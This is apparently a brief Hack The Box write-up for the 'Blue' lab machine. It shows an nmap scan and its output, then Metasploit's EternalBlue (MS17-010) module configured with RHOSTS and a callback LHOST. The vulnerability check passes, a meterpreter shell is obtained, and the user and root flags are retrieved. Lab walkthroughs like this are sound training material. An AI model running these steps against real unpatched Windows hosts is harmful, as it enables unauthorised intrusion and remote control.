2 minutes
Blue
Blue - HTB
Enumeration
Starting with a port scan, we can observe that we are dealing with a Windows machine possibly vulnerable to the notorious
nmap -sV 10.10.10.40
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-01 08:39 CEST
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 08:40 (0:00:42 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.029s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.31 seconds
Exploitation
It’s a no brainer to check with metasploit the eternalblue vulnerability.
I’m gonna use the windwos/smb/ms17_010_eternalblue exploit with the options of: RHOSTS= 10.10.10.40 LHOST= 10.10.14.6
Running check on the target metasploit confirms my suspicion of the eternalblue vulnerability
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
Running the exploit we get a meterpreter shell to the target.
A non-default directory beneath the Users directory is haris which is the same name we saw in that nmap scan under the host section, so we should definitely chek this user.
After some traversing, we can find the user.txt flag in the haris/Desktop folder.
With the same logic, we also find the root.txt inside the Administrator user’s desktop folder.